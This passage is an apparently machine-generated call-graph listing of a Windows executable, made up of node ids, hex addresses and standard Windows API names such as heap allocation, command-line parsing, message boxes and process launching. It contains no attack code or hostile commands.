13246 41576b LeaveCriticalSection 13140->13246 13142 414068 13142->13100 13153 413e77 13143->13153 13146 414c0c 13147 414c15 13146->13147 13148 414c1a 13146->13148 13216 4177fd 13147->13216 13222 417836 13148->13222 13152->13126 13154 413e74 13153->13154 13156 413e7e ctype 13153->13156 13154->13117 13154->13146 13156->13154 13157 413ea3 13156->13157 13158 413ed0 13157->13158 13159 413f13 13157->13159 13160 41570a ctype 28 API calls 13158->13160 13163 413efe 13158->13163 13159->13163 13164 413f35 13159->13164 13161 413ee6 13160->13161 13175 415df1 13161->13175 13162 413f82 RtlAllocateHeap 13166 413f05 13162->13166 13163->13162 13163->13166 13167 41570a ctype 28 API calls 13164->13167 13166->13156 13169 413f3c 13167->13169 13184 416894 13169->13184 13172 413f4f 13191 413f69 13172->13191 13178 415e23 13175->13178 13176 415ec2 13180 413ef1 13176->13180 13201 4161ab 13176->13201 13178->13176 13178->13180 13194 4160fa 13178->13194 13181 413f0a 13180->13181 13205 41576b LeaveCriticalSection 13181->13205 13183 413f11 13183->13163 13185 4168a2 ctype 13184->13185 13186 416a63 13185->13186 13187 41698e VirtualAlloc 13185->13187 13190 41695f ctype 13185->13190 13206 41659c 13186->13206 13187->13190 13190->13172 13215 41576b LeaveCriticalSection 13191->13215 13193 413f5c 13193->13163 13193->13166 13195 41613d HeapAlloc 13194->13195 13196 41610d HeapReAlloc 13194->13196 13197 41618d 13195->13197 13199 416163 VirtualAlloc 13195->13199 13196->13197 13198 41612c 13196->13198 13197->13176 13198->13195 13199->13197 13200 41617d HeapFree 13199->13200 13200->13197 13202 4161bd VirtualAlloc 13201->13202 13204 416206 13202->13204 13204->13180 13205->13183 13207 4165b0 HeapAlloc 13206->13207 13208 4165a9 13206->13208 13209 4165cd VirtualAlloc 13207->13209 13210 416605 ctype 13207->13210 13208->13209 13211 4166c2 13209->13211 13212 4165ed VirtualAlloc 13209->13212 13210->13190 13211->13210 13213 4166ca HeapFree 13211->13213 13212->13210 13214 4166b4 VirtualFree 13212->13214 13213->13210 13214->13211 13215->13193 13217 417807 13216->13217 13218 417834 13217->13218 13219 417836 ctype 7 API calls 13217->13219 13218->13148 13220 41781e 13219->13220 13221 417836 ctype 7 API calls 13220->13221 13221->13218 13225 417849 13222->13225 13223 414c23 13223->13117 13224 417960 ctype 13228 417973 GetStdHandle WriteFile 13224->13228 13225->13223 13225->13224 13226 417889 13225->13226 13226->13223 13227 417895 GetModuleFileNameA 13226->13227 13229 4178ad ctype 13227->13229 13228->13223 13231 418320 13229->13231 13232 41832d LoadLibraryA 13231->13232 13234 41836f 13231->13234 13233 41833e GetProcAddress 13232->13233 13232->13234 13233->13234 13235 418355 GetProcAddress GetProcAddress 13233->13235 13234->13223 13235->13234 13236->13135 13240 416743 13237->13240 13238 4167f3 13238->13139 13239 416764 VirtualFree 13239->13240 13240->13238 13240->13239 13242 4166e0 VirtualFree 13240->13242 13243 4166fd 13242->13243 13244 41672d 13243->13244 13245 41670d HeapFree 13243->13245 13244->13240 13245->13240 13246->13142 13247 414b04 GetVersion 13278 4159f8 HeapCreate 13247->13278 13249 414b62 13250 414b67 13249->13250 13251 414b6f 13249->13251 13683 414c31 13250->13683 13290 4154bc 13251->13290 13255 414b74 13256 414b80 13255->13256 13257 414b78 13255->13257 13300 417641 13256->13300 13259 414c31 8 API calls 13257->13259 13261 414b7f 13259->13261 13260 414b8a GetCommandLineA 13314 41750f 13260->13314 13261->13256 13265 414ba4 13346 417209 13265->13346 13267 414ba9 13268 414bae GetStartupInfoA 13267->13268 13359 4171b1 13268->13359 13270 414bc0 GetModuleHandleA 13363 401014 13270->13363 13279 415a18 13278->13279 13280 415a4e 13278->13280 13697 4158b0 13279->13697 13280->13249 13283 415a34 13286 415a51 13283->13286 13288 41659c ctype 5 API calls 13283->13288 13284 415a27 13709 415a55 HeapAlloc 13284->13709 13286->13249 13287 415a31 13287->13286 13289 415a42 HeapDestroy 13287->13289 13288->13287 13289->13280 13810 4156e1 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 13290->13810 13292 4154c2 TlsAlloc 13293 4154d2 13292->13293 13294 41550c 13292->13294 13295 416efc 30 API calls 13293->13295 13294->13255 13296 4154db 13295->13296 13296->13294 13297 4154e3 TlsSetValue 13296->13297 13297->13294 13298 4154f4 13297->13298 13299 4154fa GetCurrentThreadId 13298->13299 13299->13255 13301 413e65 ctype 29 API calls 13300->13301 13302 417654 13301->13302 13303 417662 GetStartupInfoA 13302->13303 13304 414c0c ctype 7 API calls 13302->13304 13306 417781 13303->13306 13307 4176b0 13303->13307 13304->13303 13308 4177ac GetStdHandle 13306->13308 13309 4177ec SetHandleCount 13306->13309 13307->13306 13310 413e65 ctype 29 API calls 13307->13310 13312 417727 13307->13312 13308->13306 13311 4177ba GetFileType 13308->13311 13309->13260 13310->13307 13311->13306 13312->13306 13313 417749 GetFileType 13312->13313 13313->13312 13315 41752a GetEnvironmentStringsW 13314->13315 13316 41755d 13314->13316 13318 417532 13315->13318 13319 41753e GetEnvironmentStrings 13315->13319 13317 41754e 13316->13317 13316->13318 13320 414b9a 13317->13320 13322 4175f0 GetEnvironmentStrings 13317->13322 13327 4175fc 13317->13327 13321 41756a GetEnvironmentStringsW 13318->13321 13324 417576 WideCharToMultiByte 13318->13324 13319->13317 13319->13320 13337 4172c2 13320->13337 13321->13320 13321->13324 13322->13320 13322->13327 13325 4175aa 13324->13325 13326 4175dc FreeEnvironmentStringsW 13324->13326 13329 413e65 ctype 29 API calls 13325->13329 13326->13320 13328 413e65 ctype 29 API calls 13327->13328 13335 417617 13328->13335 13330 4175b0 13329->13330 13330->13326 13331 4175b9 WideCharToMultiByte 13330->13331 13333 4175d3 13331->13333 13334 4175ca 13331->13334 13332 41762d FreeEnvironmentStringsA 13332->13320 13333->13326 13336 413f9f ctype 29 API calls 13334->13336 13335->13332 13336->13333 13338 4172d4 13337->13338 13339 4172d9 GetModuleFileNameA 13337->13339 13811 418212 13338->13811 13341 4172fc 13339->13341 13342 413e65 ctype 29 API calls 13341->13342 13343 41731d 13342->13343 13344 41732d 13343->13344 13345 414c0c ctype 7 API calls 13343->13345 13344->13265 13345->13344 13347 417216 13346->13347 13350 41721b ctype 13346->13350 13348 418212 48 API calls 13347->13348 13348->13350 13349 413e65 ctype 29 API calls 13351 417248 13349->13351 13350->13349 13352 414c0c ctype 7 API calls 13351->13352 13358 41725c ctype 13351->13358 13352->13358 13353 41729f 13354 413f9f ctype 29 API calls 13353->13354 13355 4172ab 13354->13355 13355->13267 13356 413e65 ctype 29 API calls 13356->13358 13357 414c0c ctype 7 API calls 13357->13358 13358->13353 13358->13356 13358->13357 13360 4171ba 13359->13360 13362 4171bf 13359->13362 13361 418212 48 API calls 13360->13361 13361->13362 13362->13270 13840 401a51 GetVersionExA 13363->13840 13368 402170 30 API calls 13369 401067 13368->13369 13370 402170 30 API calls 13369->13370 13371 401079 13370->13371 13372 402170 30 API calls 13371->13372 13373 40108b GetCommandLineW 13372->13373 13848 401c80 13373->13848 13380 402170 30 API calls 13381 4010c7 13380->13381 13865 4045e2 13381->13865 13388 401c80 30 API calls 13389 4010f5 13388->13389 13897 401e3a 13389->13897 13394 403a9c ctype 29 API calls 13395 401118 13394->13395 13396 403a9c ctype 29 API calls 13395->13396 13397 401120 13396->13397 13398 40115a 13397->13398 14014 401e19 13397->14014 13904 40243e 13398->13904 13405 401182 13407 401186 13405->13407 13408 40119f 13405->13408 13406 401141 13409 403a9c ctype 29 API calls 13406->13409 13410 401197 13407->13410 14021 411093 MessageBoxW 13407->14021 13411 401c80 30 API calls 13408->13411 13412 401149 13409->13412 13417 403a9c ctype 29 API calls 13410->13417 13414 4011af 13411->13414 13415 40235e 30 API calls 13412->13415 13416 402170 30 API calls 13414->13416 13418 401152 13415->13418 13425 4011c1 13416->13425 13419 4019cc 13417->13419 13420 402323 30 API calls 13418->13420 13422 403a9c ctype 29 API calls 13419->13422 13420->13398 13421 4014b1 13917 401ecd 13421->13917 13423 4019d4 13422->13423 13426 403a9c ctype 29 API calls 13423->13426 13425->13421 14022 403d5a 13425->14022 13430 4019dc 13426->13430 13433 403a9c ctype 29 API calls 13430->13433 13434 4019e4 13433->13434 13440 403a9c ctype 29 API calls 13434->13440 13435 4014f0 13925 403a76 13435->13925 13436 4014d7 13441 4014e8 13436->13441 14066 411093 MessageBoxW 13436->14066 13437 401212 13442 401c80 30 API calls 13437->13442 13438 4011f9 13439 40120a 13438->13439 14049 411093 MessageBoxW 13438->14049 14057 4042d6 13439->14057 13445 4019ec 13440->13445 13448 401a2d 36 API calls 13441->13448 13447 40121f 13442->13447 13449 403a9c ctype 29 API calls 13445->13449 14050 404073 13447->14050 13452 4019a3 13448->13452 13634 401395 13449->13634 13455 403a9c ctype 29 API calls 13452->13455 13461 4019ae 13455->13461 13456 403a9c ctype 29 API calls 13462 401239 13456->13462 13457 4014f7 13930 408107 13457->13930 13459 40134f 13463 403a9c ctype 29 API calls 13459->13463 13465 403a9c ctype 29 API calls 13461->13465 13466 401c80 30 API calls 13462->13466 13467 401357 13463->13467 13470 4019b6 13465->13470 13471 401248 13466->13471 13472 403a9c ctype 29 API calls 13467->13472 13468 40152a 14067 411093 MessageBoxW 13468->14067 13469 40153b 13940 401a03 13469->13940 13474 403a9c ctype 29 API calls 13470->13474 13476 404073 30 API calls 13471->13476 13477 401362 13472->13477 13474->13410 13479 40125a 13476->13479 13480 403a9c ctype 29 API calls 13477->13480 13482 403a9c ctype 29 API calls 13479->13482 13483 40136a 13480->13483 13481 402170 30 API calls 13484 401562 13481->13484 13485 401262 13482->13485 13487 403a9c ctype 29 API calls 13483->13487 13943 402f15 13484->13943 13486 401c80 30 API calls 13485->13486 13489 401271 13486->13489 13490 401372 13487->13490 13492 404073 30 API calls 13489->13492 13493 403a9c ctype 29 API calls 13490->13493 13497 401286 13492->13497 13498 40137a 13493->13498 13494 401585 13499 4015f0 13494->13499 13503 4015b6 13494->13503 14068 40602f 13494->14068 13495 4015f9 13496 403a9c ctype 29 API calls 13495->13496 13500 401601 13496->13500 13501 403a9c ctype 29 API calls 13497->13501 13502 403a9c ctype 29 API calls 13498->13502 13507 403a9c ctype 29 API calls 13499->13507 13505 401ecd 30 API calls 13500->13505 13506 40128e 13501->13506 13508 401382 13502->13508 13503->13499 13521 40602f 33 API calls 13503->13521 13510 40160a 13505->13510 13511 403b4f ctype 5 API calls 13506->13511 13512 4018bc 13507->13512 13513 403a9c ctype 29 API calls 13508->13513 13985 405033 13510->13985 13516 40129f 13511->13516 13517 403a9c ctype 29 API calls 13512->13517 13518 40138a 13513->13518 13514 401d7a 30 API calls 13519 4015ab 13514->13519 13527 401c80 30 API calls 13516->13527 13522 4018c7 13517->13522 13523 403a9c ctype 29 API calls 13518->13523 13524 403a9c ctype 29 API calls 13519->13524 13520 401612 SetCurrentDirectoryA 13525 401651 13520->13525 13526 401624 SetCurrentDirectoryA 13520->13526 13528 4015d6 MessageBoxW 13521->13528 14099 401a2d 13522->14099 13523->13634 13524->13503 13529 40165a 13525->13529 13530 40172c 13525->13530 13532 403a9c ctype 29 API calls 13526->13532 13533 4012b6 13527->13533 13534 403a9c ctype 29 API calls 13528->13534 13535 401a18 31 API calls 13529->13535 13537 401787 13530->13537 14075 401d1b 13530->14075 13538 401631 13532->13538 13549 403a9c ctype 29 API calls 13533->13549 13534->13499 13539 401665 13535->13539 13536 4018de 13540 403a9c ctype 29 API calls 13536->13540 13990 401ce1 13537->13990 13543 403a9c ctype 29 API calls 13538->13543 13544 401693 13539->13544 13545 40169f 13539->13545 13546 4018e9 13540->13546 13543->13441 14071 401de3 13544->14071 13552 401a18 31 API calls 13545->13552 13551 403a9c ctype 29 API calls 13546->13551 13555 4012ce 13549->13555 13557 4018f1 13551->13557 13558 4016aa ShellExecuteExA 13552->13558 13554 401a18 31 API calls 13560 40174c 13554->13560 13556 4012eb 13555->13556 13561 401d7a 30 API calls 13555->13561 13562 40139d 13556->13562 13570 4012fd MessageBoxW 13556->13570 13563 403a9c ctype 29 API calls 13557->13563 13564 4016e6 13558->13564 13565 40170d 13558->13565 14079 40587c 13560->14079 13561->13556 13569 401c80 30 API calls 13562->13569 13571 4018fc 13563->13571 13572 4016f7 13564->13572 14074 411093 MessageBoxW 13564->14074 13568 403a9c ctype 29 API calls 13565->13568 13566 401c80 30 API calls 13573 4017ab 13566->13573 13575 40171e 13568->13575 13576 4013aa 13569->13576 13570->13562 13577 401315 13570->13577 13578 403a9c ctype 29 API calls 13571->13578 13581 403a9c ctype 29 API calls 13572->13581 13997 401e56 13573->13997 13583 403a9c ctype 29 API calls 13575->13583 13584 404073 30 API calls 13576->13584 13585 403a9c ctype 29 API calls 13577->13585 13586 401904 13578->13586 13588 4016ff 13581->13588 13582 403a9c ctype 29 API calls 13589 401767 13582->13589 13590 401726 13583->13590 13591 4013bf 13584->13591 13592 401320 13585->13592 13593 403a9c ctype 29 API calls 13586->13593 13595 403a9c ctype 29 API calls 13588->13595 13589->13537 13596 40176d 13589->13596 13598 40195a 13590->13598 13599 401d7a 30 API calls 13591->13599 13600 403a9c ctype 29 API calls 13592->13600 13601 40190c 13593->13601 13594 403a9c ctype 29 API calls 13602 4017c3 13594->13602 13603 401707 13595->13603 13597 4018af SetCurrentDirectoryA 13596->13597 14087 411093 MessageBoxW 13596->14087 13597->13499 13606 401960 WaitForSingleObject CloseHandle 13598->13606 13607 401974 SetCurrentDirectoryA 13598->13607 13608 4013c8 13599->13608 13609 401328 13600->13609 13610 403a9c ctype 29 API calls 13601->13610 13611 403a9c ctype 29 API calls 13602->13611 13604 401782 13603->13604 13604->13597 13606->13607 13613 403a9c ctype 29 API calls 13607->13613 13612 403a9c ctype 29 API calls 13608->13612 13614 403a9c ctype 29 API calls 13609->13614 13615 401914 13610->13615 13616 4017cb 13611->13616 13618 4013d3 13612->13618 13619 401981 13613->13619 13614->13439 13620 403a9c ctype 29 API calls 13615->13620 13617 401c80 30 API calls 13616->13617 13621 4017da 13617->13621 13622 403a9c ctype 29 API calls 13618->13622 13623 403a9c ctype 29 API calls 13619->13623 13624 40191c 13620->13624 13626 401e56 30 API calls 13621->13626 13627 4013db 13622->13627 13623->13441 13625 403a9c ctype 29 API calls 13624->13625 13628 401924 13625->13628 13629 4017ed 13626->13629 13630 401c80 30 API calls 13627->13630 13631 403a9c ctype 29 API calls 13628->13631 13632 403a9c ctype 29 API calls 13629->13632 13633 4013ea 13630->13633 13631->13634 13635 4017f5 13632->13635 13636 404073 30 API calls 13633->13636 13689 416c96 13634->13689 13637 401811 13635->13637 14088 401db8 13635->14088 13638 4013ff 13636->13638 14001 402634 13637->14001 13639 401d7a 30 API calls 13638->13639 13642 401408 13639->13642 13645 403a9c ctype 29 API calls 13642->13645 13648 401413 13645->13648 13646 401de3 30 API calls 13646->13637 13650 403a9c ctype 29 API calls 13648->13650 13653 40141b 13650->13653 13656 401c80 30 API calls 13653->13656 13659 40142a 13656->13659 13662 404073 30 API calls 13659->13662 13663 401443 13662->13663 13664 402634 30 API calls 13663->13664 13665 401450 13664->13665 13666 401d7a 30 API calls 13665->13666 13667 401459 13666->13667 13668 403a9c ctype 29 API calls 13667->13668 13669 401464 13668->13669 13670 403a9c ctype 29 API calls 13669->13670 13671 40146f 13670->13671 13672 403a9c ctype 29 API calls 13671->13672 13673 401477 13672->13673 13674 403a9c ctype 29 API calls 13673->13674 13675 401482 13674->13675 13676 403a9c ctype 29 API calls 13675->13676 13677 40148a 13676->13677 13678 403a9c ctype 29 API calls 13677->13678 13679 401492 13678->13679 13680 4042d6 ctype 34 API calls 13679->13680 13681 4014a6 13680->13681 13682 4042ad ctype 34 API calls 13681->13682 13682->13421 13684 414c3a 13683->13684 13685 414c3f 13683->13685 13686 4177fd ctype 7 API calls 13684->13686 13687 417836 ctype 7 API calls 13685->13687 13686->13685 13688 414c48 ExitProcess 13687->13688 16468 416cb8 13689->16468 13692 417039 13693 415523 35 API calls 13692->13693 13694 417044 13693->13694 13695 41716a UnhandledExceptionFilter 13694->13695 13696 414bfe 13694->13696 13695->13696 13711 413cc0 13697->13711 13700 4158f3 GetEnvironmentVariableA 13704 415912 13700->13704 13708 4159d0 13700->13708 13701 4158d9 13701->13700 13702 4158eb 13701->13702 13702->13283 13702->13284 13705 415957 GetModuleFileNameA 13704->13705 13706 41594f 13704->13706 13705->13706 13706->13708 13713 4179f0 13706->13713 13708->13702 13716 415883 GetModuleHandleA 13708->13716 13710 415a71 13709->13710 13710->13287 13712 413ccc GetVersionExA 13711->13712 13712->13700 13712->13701 13718 417a07 13713->13718 13717 41589a 13716->13717 13717->13702 13720 417a1f 13718->13720 13722 417a4f 13720->13722 13727 4187a8 13720->13727 13721 4187a8 6 API calls 13721->13722 13722->13721 13724 417b78 13722->13724 13726 417a03 13722->13726 13731 41866d 13722->13731 13724->13726 13742 416eea 13724->13742 13726->13708 13728 4187c6 13727->13728 13730 4187ba 13727->13730 13745 418a6c 13728->13745 13730->13720 13732 41868b InterlockedIncrement 13731->13732 13734 418678 13731->13734 13733 4186a7 InterlockedDecrement 13732->13733 13738 4186b1 13732->13738 13735 41570a ctype 29 API calls 13733->13735 13734->13722 13735->13738 13757 4186dc 13738->13757 13739 4186d1 InterlockedDecrement 13739->13734 13740 4186c7 13763 41576b LeaveCriticalSection 13740->13763 13782 415523 GetLastError TlsGetValue 13742->13782 13744 416eef 13744->13726 13746 418a9d GetStringTypeW 13745->13746 13747 418ab5 13745->13747 13746->13747 13748 418ab9 GetStringTypeA 13746->13748 13750 418ae0 GetStringTypeA 13747->13750 13752 418b04 13747->13752 13748->13747 13749 418ba1 13748->13749 13749->13730 13750->13749 13752->13749 13753 418b1a MultiByteToWideChar 13752->13753 13753->13749 13754 418b3e ctype 13753->13754 13754->13749 13755 418b78 MultiByteToWideChar 13754->13755 13755->13749 13756 418b91 GetStringTypeW 13755->13756 13756->13749 13758 418707 13757->13758 13762 4186be 13757->13762 13759 418723 13758->13759 13760 4187a8 6 API calls 13758->13760 13759->13762 13764 41881d 13759->13764 13760->13759 13762->13739 13762->13740 13763->13734 13765 418869 13764->13765 13766 41884d LCMapStringW 13764->13766 13769 4188b2 LCMapStringA 13765->13769 13770 4188cf 13765->13770 13766->13765 13767 418871 LCMapStringA 13766->13767 13767->13765 13768 4189ab 13767->13768 13768->13762 13769->13768 13770->13768 13771 4188e5 MultiByteToWideChar 13770->13771 13771->13768 13772 41890f 13771->13772 13772->13768 13773 418945 MultiByteToWideChar 13772->13773 13773->13768 13774 41895e LCMapStringW 13773->13774 13774->13768 13775 418979 13774->13775 13776 41897f 13775->13776 13778 4189bf 13775->13778 13776->13768 13777 41898d LCMapStringW 13776->13777 13777->13768 13778->13768 13779 4189f7 LCMapStringW 13778->13779 13779->13768 13780 418a0f WideCharToMultiByte 13779->13780 13780->13768 13783 41553f 13782->13783 13784 41557e SetLastError 13782->13784 13793 416efc 13783->13793 13784->13744 13787 415550 TlsSetValue 13788 415576 13787->13788 13789 415561 13787->13789 13790 414c0c ctype 7 API calls 13788->13790 13792 415567 GetCurrentThreadId 13789->13792 13791 41557d 13790->13791 13791->13784 13792->13784 13801 416f31 ctype 13793->13801 13794 415548 13794->13787 13794->13788 13795 41570a 29 API calls ctype 13795->13801 13796 416fe9 HeapAlloc 13796->13801 13797 415df1 ctype 5 API calls 13797->13801 13798 416894 ctype 6 API calls 13798->13801 13801->13794 13801->13795 13801->13796 13801->13797 13801->13798 13802 416f95 13801->13802 13805 41701e 13801->13805 13808 41576b LeaveCriticalSection 13802->13808 13804 416f9c 13804->13801 13809 41576b LeaveCriticalSection 13805->13809 13807 417025 13807->13801 13808->13804 13809->13807 13810->13292 13812 41821b 13811->13812 13813 418222 13811->13813 13815 417e3a 13812->13815 13813->13339 13816 41570a ctype 29 API calls 13815->13816 13817 417e4a 13816->13817 13826 417fe7 13817->13826 13821 417fdf 13821->13813 13823 417e86 GetCPInfo 13825 417e9c 13823->13825 13824 417e61 13839 41576b LeaveCriticalSection 13824->13839 13825->13824 13831 41808d GetCPInfo 13825->13831 13827 418007 13826->13827 13828 417ff7 GetOEMCP 13826->13828 13829 417e52 13827->13829 13830 41800c GetACP 13827->13830 13828->13827 13829->13823 13829->13824 13829->13825 13830->13829 13832 418178 13831->13832 13836 4180b0 13831->13836 13832->13824 13833 418a6c 6 API calls 13834 41812c 13833->13834 13835 41881d 9 API calls 13834->13835 13837 418150 13835->13837 13836->13833 13838 41881d 9 API calls 13837->13838 13838->13832 13839->13821 13841 40102d 13840->13841 13842 402170 13841->13842 13843 402180 13842->13843 13844 401055 13842->13844 13845 403a76 30 API calls 13843->13845 13844->13368 13846 40218a 13845->13846 13846->13844 13847 403a9c ctype 29 API calls 13846->13847 13847->13844 13849 401c9e 13848->13849 13850 402170 30 API calls 13849->13850 13851 40109a 13850->13851 13852 4038ee 13851->13852 13857 4038f8 __EH_prolog 13852->13857 13853 40396d 13854 401e19 30 API calls 13853->13854 13856 40397c 13854->13856 13855 401db8 30 API calls 13855->13857 13858 401d7a 30 API calls 13856->13858 13857->13853 13857->13855 13861 4010ac 13857->13861 13859 403989 13858->13859 13860 403a9c ctype 29 API calls 13859->13860 13860->13861 13862 403a9c 13861->13862 13863 413f9f ctype 29 API calls 13862->13863 13864 4010b4 13863->13864 13864->13380 13866 4045ec __EH_prolog 13865->13866 13867 40460b GetModuleFileNameW 13866->13867 13868 40463f 13866->13868 13869 404625 13867->13869 13870 404637 13867->13870 13871 40243e 30 API calls 13868->13871 13869->13870 13875 401d1b 30 API calls 13869->13875 13873 4010d5 13870->13873 13872 404652 13871->13872 14104 404598 GetModuleFileNameA 13872->14104 13885 40235e 13873->13885 13875->13870 13877 40468e 13880 403a9c ctype 29 API calls 13877->13880 13878 404663 AreFileApisANSI 14108 403b9c 13878->14108 13880->13870 13882 401d7a 30 API calls 13883 404686 13882->13883 13884 403a9c ctype 29 API calls 13883->13884 13884->13877 13886 402368 __EH_prolog 13885->13886 14126 4025a3 13886->14126 13888 402377 13889 403a9c ctype 29 API calls 13888->13889 13890 4010dd 13889->13890 13891 402323 13890->13891 13892 40232d __EH_prolog 13891->13892 13893 4025a3 30 API calls 13892->13893 13894 40233c 13893->13894 13895 403a9c ctype 29 API calls 13894->13895 13896 4010e5 13895->13896 13896->13388 14140 40220e 13897->14140 13900 403b4f 13903 403b58 13900->13903 13901 403aa7 5 API calls ctype 13901->13903 13902 40110e 13902->13394 13903->13901 13903->13902 13905 40244e 13904->13905 13909 40116c 13904->13909 13906 403a76 30 API calls 13905->13906 13907 402455 13906->13907 13908 403a9c ctype 29 API calls 13907->13908 13907->13909 13908->13909 13910 401af4 13909->13910 13911 401afe __EH_prolog 13910->13911 14153 405b6d 13911->14153 13913 401b30 13913->13405 13915 401b2c ctype 13915->13913 14156 405bca 13915->14156 14160 401ee5 13915->14160 13918 40243e 30 API calls 13917->13918 13919 4014c2 13918->13919 13920 405298 13919->13920 13921 401a2d 36 API calls 13920->13921 13922 4052a0 13921->13922 14224 4051c8 13922->14224 13926 413e65 ctype 29 API calls 13925->13926 13927 403a81 13926->13927 13928 403a9a 13927->13928 14326 413d3d RaiseException 13927->14326 13928->13457 13931 408111 __EH_prolog 13930->13931 13932 4042d6 ctype 34 API calls 13931->13932 13934 408120 13932->13934 13935 401d1b 30 API calls 13934->13935 13939 401526 13934->13939 14327 4081a8 13934->14327 14330 407f06 13934->14330 14357 408248 13934->14357 14365 402092 13934->14365 13935->13934 13939->13468 13939->13469 13941 403b9c 31 API calls 13940->13941 13942 40154c 13941->13942 13942->13481 13944 402f1f __EH_prolog 13943->13944 14443 403376 13944->14443 13947 401d7a 30 API calls 13948 402f53 13947->13948 13949 401d7a 30 API calls 13948->13949 13950 402f61 13949->13950 13951 403a76 30 API calls 13950->13951 13952 402f6b 13951->13952 13954 402f7e 13952->13954 14509 4034e3 13952->14509 13955 403037 13954->13955 13956 402f9a 13954->13956 14451 403113 13955->14451 14523 413220 13956->14523 13959 403042 13961 401d7a 30 API calls 13959->13961 13960 402fc2 13962 402fd5 13960->13962 13963 402fc8 13960->13963 13965 403050 13961->13965 13964 402170 30 API calls 13962->13964 14529 4131e0 13963->14529 13967 402fe8 13964->13967 13968 403065 13965->13968 13971 401d7a 30 API calls 13965->13971 13970 40602f 33 API calls 13967->13970 14499 40348a 13968->14499 13972 402ff7 13970->13972 13971->13968 13974 401d7a 30 API calls 13972->13974 13976 403004 13974->13976 13977 403a9c ctype 29 API calls 13976->13977 13978 403010 13977->13978 14533 40309d 13978->14533 13980 403021 13981 403a9c ctype 29 API calls 13980->13981 13982 403029 13981->13982 13983 4131e0 ctype 2 API calls 13982->13983 13984 403035 13983->13984 13984->13959 13986 405041 13985->13986 13987 405047 GetCurrentDirectoryA 13985->13987 13988 40243e 30 API calls 13986->13988 13989 405059 13987->13989 13988->13987 13989->13520 13991 402170 30 API calls 13990->13991 13992 401796 13991->13992 13993 405d0b 13992->13993 13994 40179e 13993->13994 13995 405d16 13993->13995 13994->13566 13995->13994 13996 401db8 30 API calls 13995->13996 13996->13994 13998 4017bb 13997->13998 13999 401e69 13997->13999 13998->13594 13999->13998 16283 402399 13999->16283 14002 40263e __EH_prolog 14001->14002 14003 401ce1 30 API calls 14002->14003 14004 402651 14003->14004 14005 401de3 30 API calls 14004->14005 14006 402660 14005->14006 14015 40220e 30 API calls 14014->14015 14016 401138 14015->14016 14017 401d7a 14016->14017 14018 401d86 14017->14018 14020 401d98 14017->14020 14019 402170 30 API calls 14018->14019 14019->14020 14020->13406 14021->13410 14023 403d64 __EH_prolog 14022->14023 14024 4042d6 ctype 34 API calls 14023->14024 14047 403d75 14024->14047 14025 402ee1 30 API calls 14025->14047 14027 403eec 14028 403a9c ctype 29 API calls 14027->14028 14029 403ef4 14028->14029 14030 403a9c ctype 29 API calls 14029->14030 14031 403efc 14030->14031 14032 403a9c ctype 29 API calls 14031->14032 14033 4011f5 14032->14033 14033->13437 14033->13438 14034 40243e 30 API calls 14034->14047 14035 403f09 14036 403a9c ctype 29 API calls 14035->14036 14038 403f11 14036->14038 14037 40411f 30 API calls 14037->14047 14039 403a9c ctype 29 API calls 14038->14039 14040 403f19 14039->14040 14042 403a9c ctype 29 API calls 14040->14042 14043 403f21 14042->14043 14046 403a9c ctype 29 API calls 14043->14046 14044 403a9c 29 API calls ctype 14044->14047 14045 401ee5 30 API calls 14045->14047 14046->14033 14047->14025 14047->14027 14047->14033 14047->14034 14047->14035 14047->14037 14047->14044 14047->14045 16291 403f3c 14047->16291 16301 4040be 14047->16301 16311 40213f 14047->16311 14049->13439 14051 40408b 14050->14051 14052 4040a5 14051->14052 14053 40408f 14051->14053 14055 401ce1 30 API calls 14052->14055 14054 402170 30 API calls 14053->14054 14056 401231 14054->14056 14055->14056 14056->13456 14058 4042eb ctype 34 API calls 14057->14058 14059 401344 14058->14059 14060 4042ad 14059->14060 14061 4042b8 14060->14061 14062 4042d6 ctype 34 API calls 14061->14062 14063 4042c0 14062->14063 14064 403a9c ctype 29 API calls 14063->14064 14065 4042c8 14064->14065 14065->13459 14066->13441 14067->13441 16316 405f5e 14068->16316 14072 4021c4 30 API calls 14071->14072 14073 401df3 14072->14073 14073->13545 14074->13572 14076 401d38 14075->14076 14077 402170 30 API calls 14076->14077 14078 40173e 14077->14078 14078->13554 14080 405886 __EH_prolog 14079->14080 14081 404d51 30 API calls 14080->14081 14082 405895 14081->14082 14083 405806 32 API calls 14082->14083 14084 4058a2 14083->14084 14085 403a9c ctype 29 API calls 14084->14085 14086 401753 14085->14086 14086->13582 14087->13604 14089 4021c4 30 API calls 14088->14089 14090 401805 14089->14090 14090->13646 14100 401a35 14099->14100 14101 401a39 14099->14101 14100->13536 16378 404c4a 14101->16378 14105 4045c7 14104->14105 14107 4045d9 14104->14107 14105->14107 14121 4046ab 14105->14121 14107->13877 14107->13878 14109 403ba6 __EH_prolog 14108->14109 14110 402170 30 API calls 14109->14110 14111 403bc9 14110->14111 14112 403c10 14111->14112 14113 403be1 MultiByteToWideChar 14111->14113 14115 402170 30 API calls 14111->14115 14114 401ce1 30 API calls 14112->14114 14113->14112 14116 403bfb 14113->14116 14117 403c26 14114->14117 14115->14113 14125 413d3d RaiseException 14116->14125 14119 403a9c ctype 29 API calls 14117->14119 14120 403c2e 14119->14120 14120->13882 14122 4046c1 14121->14122 14122->14122 14123 40243e 30 API calls 14122->14123 14124 4046d0 14123->14124 14124->14107 14125->14112 14127 4025ad __EH_prolog 14126->14127 14128 402170 30 API calls 14127->14128 14129 4025c9 14128->14129 14130 401db8 30 API calls 14129->14130 14131 4025d6 14130->14131 14132 401db8 30 API calls 14131->14132 14133 4025e0 14132->14133 14134 401db8 30 API calls 14133->14134 14135 4025ea 14134->14135 14136 401ce1 30 API calls 14135->14136 14137 4025f6 14136->14137 14138 403a9c ctype 29 API calls 14137->14138 14139 4025fe 14138->14139 14139->13888 14142 402218 __EH_prolog 14140->14142 14141 40224c 14144 402170 30 API calls 14141->14144 14142->14141 14143 402241 14142->14143 14145 401ce1 30 API calls 14143->14145 14146 40225f 14144->14146 14152 401105 14145->14152 14147 402170 30 API calls 14146->14147 14148 40226c 14147->14148 14149 401ce1 30 API calls 14148->14149 14150 4022a0 14149->14150 14151 403a9c ctype 29 API calls 14150->14151 14151->14152 14152->13900 14163 405b4c 14153->14163 14157 405bd7 14156->14157 14159 405c03 14157->14159 14215 405ba8 14157->14215 14159->13915 14220 40248c 14160->14220 14166 405b2f 14163->14166 14169 4059b3 14166->14169 14170 4059bd __EH_prolog 14169->14170 14171 405a25 14170->14171 14172 4059ce 14170->14172 14187 405a63 14171->14187 14173 401c80 30 API calls 14172->14173 14176 4059d9 